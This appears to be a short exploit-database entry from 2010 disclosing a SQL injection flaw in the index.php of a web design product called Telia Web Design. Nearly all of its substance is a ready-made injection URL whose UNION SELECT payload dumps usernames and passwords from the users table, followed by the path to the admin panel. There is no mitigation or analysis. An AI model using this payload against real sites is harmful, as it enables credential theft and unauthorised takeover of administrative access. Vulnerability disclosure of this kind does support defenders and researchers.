id: 12379
date: 05/24/2010
title: Telia Web Design (index.php) SQL Injection Vulnerability
author: CoBRa_21
cves: 

========================================================
Telia Web Design (index.php) SQL Injection Vulnerability
========================================================


Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://www.telia.co.gr/
 
-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/**/select/**/group_concat(username,0x3a,password),2/**/from/**/users
 
 
Admin Panel
 
http://localhost/[path]/admin
------------------------------------------------------------------------------------------- 



#  0day.today [2023-03-25]  #